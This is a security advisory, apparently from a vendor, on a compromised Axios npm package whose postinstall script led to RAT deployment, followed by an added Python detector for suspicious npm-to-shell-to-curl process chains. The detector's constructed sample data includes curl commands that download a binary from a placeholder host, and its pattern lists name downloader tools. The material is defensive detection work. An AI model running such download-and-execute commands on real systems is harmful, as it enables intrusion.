Axios NPM Package Supply Chain Compromise Leads to RAT Deployment

KEY OBSERVATIONS

  • Malicious Package Versions Identified: Malicious versions of the Axios npm package (axios@1.14.1 and axios@0.30.4) were observed within a customer’s environment, indicating exposure to the supply chain compromise.
  • Suspicious Dependency Execution: An unauthorized dependency was identified that executed a postinstall script during npm installation, triggering the initial stage of the infection.
  • Abnormal Process Execution Chain: Multiple systems exhibited suspicious parent-child process relationships in which npm or node spawned a command interpreter such as cmd.exe or powershell.exe, followed by execution of a network utility such as curl or wget.
  • Post-exploitation activities detected by LevelBlue: LevelBlue’s Cybereason Defense Platform generated detections associated with post-install script execution, abnormal process (renamed PowerShell) spawning, and suspicious outbound network communication, indicating successful exploitation and potential remote access trojan (RAT) deployment on affected systems.
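The two process-level observations above (npm/node spawning a shell that then runs curl or wget, and a renamed PowerShell binary) can be checked against process-creation telemetry. The following is an added example, not code from the LevelBlue advisory; it assumes each event carries the parent PID and the PE OriginalFileName (as Sysmon process-create events do), and the events are constructed sample data.

```python
from dataclasses import dataclass

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str          # basename of the executable on disk
    original_name: str  # PE OriginalFileName from version info ("" if absent)
    cmdline: str

PKG_MANAGERS = {"node.exe", "npm.cmd", "npx.cmd"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOADERS = {"curl.exe", "wget.exe"}

def is_renamed_powershell(ev: ProcEvent) -> bool:
    # Renaming powershell.exe on disk does not change its PE OriginalFileName.
    return ev.original_name.lower() == "powershell.exe" and ev.image.lower() != "powershell.exe"

def is_shell(ev: ProcEvent) -> bool:
    return ev.image.lower() in SHELLS or is_renamed_powershell(ev)

def find_suspicious_chains(events):
    """Return (pkg_pid, shell_pid, downloader_pid) for npm/node -> shell -> curl/wget chains."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        if ev.image.lower() not in DOWNLOADERS:
            continue
        shell = by_pid.get(ev.ppid)
        if shell is None or not is_shell(shell):
            continue
        pkg = by_pid.get(shell.ppid)
        if pkg is None or pkg.image.lower() not in PKG_MANAGERS:
            continue
        hits.append((pkg.pid, shell.pid, ev.pid))
    return hits

def find_renamed_powershell(events):
    return [e.pid for e in events if is_renamed_powershell(e)]

# Constructed sample telemetry (hypothetical PIDs, placeholder URL), not real captured data.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "EXPLORER.EXE", "explorer.exe"),
    ProcEvent(200, 100, "cmd.exe", "Cmd.Exe", "cmd /c npm install"),
    ProcEvent(300, 200, "node.exe", "node.exe", "node postinstall.js"),
    ProcEvent(400, 300, "cmd.exe", "Cmd.Exe", "cmd /c curl -o %TEMP%\\x.bin http://PLACEHOLDER"),
    ProcEvent(500, 400, "curl.exe", "curl.exe", "curl -o %TEMP%\\x.bin http://PLACEHOLDER"),
    ProcEvent(600, 300, "svchost.exe", "PowerShell.EXE", "svchost.exe -nop -w hidden"),  # renamed
    ProcEvent(700, 100, "powershell.exe", "PowerShell.EXE", "powershell Get-Date"),     # benign
    ProcEvent(800, 700, "curl.exe", "curl.exe", "curl https://example.invalid"),         # not via npm
]
```

Only the chain rooted at node.exe (PID 300) and the renamed PowerShell (PID 600) are flagged; the interactive PowerShell session and its curl child are not, because their grandparent is not a package manager.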
